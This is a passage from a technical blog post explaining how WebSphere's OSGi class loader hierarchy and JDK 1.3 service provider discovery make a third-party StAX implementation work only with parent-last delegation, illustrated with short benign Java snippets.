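    // with e.g. Woodstox in WEB-INF/lib and the Web module class loader as
    // TCCL, it would print the Woodstox factory class name.
    System.out.println(discover("javax.xml.stream.XMLInputFactory"));
  }
}
```

Because the lookup goes through the thread context class loader, whichever provider is visible to the current module's class loader wins, which is what makes per-application StAX implementations possible in the first place.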

All this works as expected on most application servers, except on WebSphere. On WebSphere, even with a third party StAX implementation packaged in the application, JAXP will still return the factories (XMLInputFactory, etc.) from the StAX implementation packaged with WebSphere, at least if the application uses the default (parent first) class loader delegation mode. Note that the implementation returned by JAXP is not the StAX implementation in the JDK shipped with WebSphere (which is XLXP 1), but the one found in the plugins directory (which is XLXP 2). The only way to work around this issue is to switch the delegation mode of the application or Web module to parent last (with all the difficulties that this implies on WebSphere) or to create a shared library with isolated class loader (which always uses parent last delegation mode).

In this blog post I will explain why this is so and what this tells us about the internals of WebSphere. First of all, remember that starting with version 6.1, WebSphere actually runs in an OSGi container. That is, the WebSphere runtime is actually composed of a set of OSGi bundles. These are the files that you can find in the plugins directory in the WebSphere installation, and as mentioned earlier, the StAX implementation used by WebSphere is actually packaged in one of these bundles. If you are familiar with OSGi, then you should know that each bundle has its own class loader. This raises an interesting question: how is JAXP actually able to load that StAX implementation from the thread context class loader in a Java EE application?

To answer that question, let's have a look at the class loader hierarchy of a typical Java EE application deployed on WebSphere (as seen in the class loader viewer in the admin console):

Some of the class loaders in that hierarchy are easy to identify:

  • 1 and 2 are created by the JRE. They load the classes that are required to bootstrap the OSGi container in which WebSphere runs.
  • 6 and 7 are the class loaders for the application and the (Web or EJB) module.

The interesting things actually happen in class loader number 3 (of type org.eclipse.osgi.internal.baseadaptor.DefaultClassLoader). Unfortunately there is no way to see this in the admin console, but it turns out that this is actually the class loader of one particular OSGi bundle of the WebSphere runtime. That bundle doesn't really contain any code, but its manifest has the following entry:

DynamicImport-Package: *

What this means is that all packages exported by all OSGi bundles are visible to the class loader of that bundle. In other words, class loader number 3 not only delegates to its parent, but it can also delegate to the class loader of any of the WebSphere OSGi bundles, including of course the bundle containing the StAX implementation. This is why JAXP is able to load that StAX implementation.

Note that before loading the StAX implementation, JAXP first needs to locate it. It does this by doing a lookup of the relevant META-INF/services resource (e.g. META-INF/services/javax.xml.stream.XMLInputFactory). That resource request is also delegated to all OSGi bundles. It appears that class loader number 4 is somehow involved in this, but this detail is not really relevant for the present discussion. The important thing to remember is that in the class loader hierarchy of a Java EE application, there is a class loader that delegates class loading and resource requests to all OSGi bundles of the WebSphere runtime.

Obviously this particular class loader hierarchy was not designed specifically for StAX. It actually ensures that applications have access to the standard Java EE and WebSphere specific APIs contained in the WebSphere bundles.

Now it is easy to understand why it is not possible to override the StAX implementation if the application is configured with the default parent first delegation mode: the lookup of the META-INF/services resource will return the resource included in the WebSphere runtime bundle, not the one in the StAX implementation packaged with the application. This changes when switching to parent last delegation mode (either by changing the configuration of the application/module class loader or by configuring a shared library with isolated class loader): in this case, the META-INF/services resource from the third party StAX implementation is returned first.

What has been said up to now applies to Java EE applications. On the other hand, WebSphere also uses StAX internally. E.g. the SCA runtime in WebSphere uses StAX to parse certain configuration files or deployment descriptors. This raises another interesting question. The JDK 1.3 service provider discovery mechanism has been designed with J2SE and J2EE environments in mind. On the other hand, it is a well known fact that this mechanism doesn't work well in an OSGi environment. The reason is that each OSGi bundle has its own class loader and that the thread context class loader is undefined in an OSGi environment. That is why well designed OSGi based containers don't load the StAX API classes (and other APIs that use the JDK 1.3 service provider discovery mechanism) from the JRE, but from custom bundles. Examples of such containers include Apache Geronimo and Apache ServiceMix, each of which provides its own StAX API bundle.

Although the details differ, these bundles share a common feature: the code is basically identical to the code in the JRE, except for the implementation of XMLEventFactory, XMLInputFactory and XMLOutputFactory. With respect to the code in the JRE, these classes are modified to use an alternate provider discovery mechanism that is compatible with OSGi.

WebSphere doesn't use this approach. There is no StAX API bundle, and both Java EE applications and the code in the WebSphere bundles use the API classes loaded from the JRE. The question is then how the JDK 1.3 service provider discovery mechanism can return the expected StAX implementation if it is triggered by code in the WebSphere runtime. Obviously, if the code in the WebSphere runtime is invoked by a Java EE application, then the thread context class loader is set as described earlier and there is no problem. The question therefore only applies to WebSphere code executed outside of the context of any Java EE application, e.g. during the server startup or during the processing of an incoming request that has not yet been dispatched to an application.

The answer is that WebSphere ensures that all threads it creates have the context class loader set by default to the special class loader we already encountered in the class loader hierarchy for a Java EE application shown above (see class loader 4). This is the case e.g. for all threads in the startup thread pool (which as the name suggests is used during server startup) and all idle Web container threads. Since that class loader can delegate to any bundle class loader, the JDK 1.3 service provider discovery mechanism will indeed be able to locate the StAX implementation in the WebSphere bundle.
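
The effect of presetting the context class loader on a pooled thread can be shown with a minimal, self-contained example. The anonymous class loader below merely stands in for the bundle class loader; this is an illustration of the Java mechanism, not WebSphere code:

```java
public class TcclDemo {
  // Returns true if a child thread observes the class loader that was
  // explicitly set as its context class loader before it was started.
  static boolean childSeesConfiguredLoader() throws InterruptedException {
    ClassLoader custom = new ClassLoader(TcclDemo.class.getClassLoader()) {};
    final ClassLoader[] seen = new ClassLoader[1];
    Thread t = new Thread(
        () -> seen[0] = Thread.currentThread().getContextClassLoader());
    // This is, in essence, what WebSphere does for the threads in its
    // startup and Web container thread pools (with the bundle class loader
    // in place of our dummy loader).
    t.setContextClassLoader(custom);
    t.start();
    t.join();
    return seen[0] == custom;
  }

  public static void main(String[] args) throws Exception {
    System.out.println(childSeesConfiguredLoader()); // prints true
  }
}
```

Any JDK 1.3 style provider lookup executed on such a thread therefore goes through the preset class loader, even though no application code ever set it.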

To summarize, the difficulties to change the StAX implementation can be traced back to the combination of two decisions made by IBM in the design of WebSphere:

  1. The decision not to use the StAX implementation in the JRE, but instead to use another StAX implementation deployed as an OSGi bundle in the WebSphere runtime. (Note that this is specific to StAX. For SAX, DOM and XSLT, WebSphere uses the default implementations in the JRE. This explains why the issue described in this post only occurs for StAX.)
  2. The decision to use the StAX API classes from the JRE and therefore to rely on the JDK 1.3 service provider discovery mechanism. If IBM had chosen to use the same design pattern as Geronimo and ServiceMix (and others), then they could have implemented a modified provider discovery mechanism that doesn't need the META-INF/services resources to locate the default StAX implementation in the bundle.

The conclusion is that the need to switch to parent last delegation mode to make this work is due to WebSphere's design. Whether one considers this as "working as designed" or "broken by design" is of course purely subjective... IBM support will of course tell you that it is working as designed and that changing the class loader delegation mode is not a workaround, but simply a requirement in order to use a third party StAX implementation. Your mileage may vary.